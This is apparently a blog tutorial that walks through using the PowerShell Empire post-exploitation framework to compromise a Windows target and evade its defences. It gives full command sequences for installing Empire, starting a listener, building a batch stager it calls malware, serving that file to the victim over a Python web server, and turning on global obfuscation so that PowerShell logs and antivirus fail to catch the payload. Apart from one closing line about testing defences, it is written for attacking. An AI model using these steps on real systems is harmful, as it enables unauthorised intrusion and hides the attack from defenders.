In this article, we will learn the technique of Defence Evasion using the PowerShell Empire. PowerShell Empire is one of my favorite Post Exploitation tools and it is an applaudable one at that.
Table of Contents:
·
Installation
·
Getting
a session with Empire
·
Obfuscating
with Empire
Installation
When evading all the target defenses with
Empire, it is important to focus on installation. There are two methods to
install Empire, obfuscating scripts would not work if you install Empire using
apt install command. But this problem wouldn’t occur if you use the git clone
command as shown in the image below.
git clone https://github.com/BC-SECURITY/Empire
The above command will download Empire on your
system and to install it, use the following command:
cd
Empire/
cd
setup/
.install.sh
Getting a
session with Empire
With the above commands, your Empire is
downloaded and installed. Let us now get the Empire up and running and take a
session of the target system. Once you start Empire, the first thing to do is
to start a Listener. And to start a listener, use the set of following
commands:
listeners
uselistener http
set Port 80
execute
The above commands will start a listener on
port 80. Once the listener is active, we have to launch a stager. The stager
that we are going to use in this article is of windows and is in batch
language. To launch the stager, use the following set of commands:
back
usestager
windows/launcher_bat
set Listener http
execute
Once your malware is ready, it will be stored
in /tmp directory by default as you can see in the image above. To send this
bat file to the target system, you can use python one-liner server or any other
method you like. We used a python server for our this practical. To use the
python server, type the following command in the directory where the file is
saved like in our case it was /tmp directory:
python -m SimpleHTTPServer
Once the file is executed in the target system.
You will get your session as it is shown in the image below. To access the
session or agent (as per the Empire terminology) use the following commands:
agents
interact <agent
name>
In the event viewer, you can go to the Applications
and Services Logs > Microsoft > Windows > PowerShell > Operational and
check the log made by the batch file from Empire as shown in the image below:
Obfuscating
with Empire
Now, you can see in the image above that the
log of the file gives proper detail of the malicious file. These details
include the code of the file, where the file is stored, and other important
details. These details, when readable by the system, makes it easy for the file
to be detected. For successfully attacking the target, it is important to evade
all the defenses put up by the target. And to do so, we will globally obfuscate
the Empire and then create our malicious file. Obfuscating the Empire will mean
all the malicious files that will be generated from Empire will be obscure i.e.
they will be had to detect in the target system and will allow you to bypass
the defense systems like antiviruses. To obfuscate the Empire, use the
following command first:
preobfuscate
The above command will download all the scripts
required for the obfuscation.
The command executed above takes a bit of time
but if it allows us to be successful in our attack then little time is no
problem and most importantly it is worth it. Once all the obfuscating scripts
are downloaded, execute the following command:
set Obfuscate true
This command will initiate the obfuscating and
all the stagers developed and agents created will be obfuscated, which you can
see in the image below:
Now once the obfuscation is active, we will
once again execute the listener as shown previously in this article and once
the listener is up and running we will launch a stager with the following set
of commands:
usestager
windows/launcher_bat
set Listener http
execute
Similarly, like before, use the python server
to deliver the malicious file to the target system.
Once the file is executed in the target system;
you will get a new session as shown in the image below. To access the new
agent, use the following commands:
agents
interact <agent name>
Now the session we have received is through
obfuscation and we will confirm this by using Event Viewer. Follow the same
path as earlier (Applications and Services Logs > Microsoft > Windows
> PowerShell > Operational) in the Event Viewer to see the log
created by our malicious file. AS you
can see in the image below, the details that the log has now is vague and
confusing. This makes the file unreadable by the system and is successful in
dodging defenses such as anti-viruses.
This way Obfuscated Empire can save you from
getting caught in the target system. It is important to learn such techniques
to glide by the defenses in the target system to test whether the defenses in
the place are proper or not.
0 comments:
Post a Comment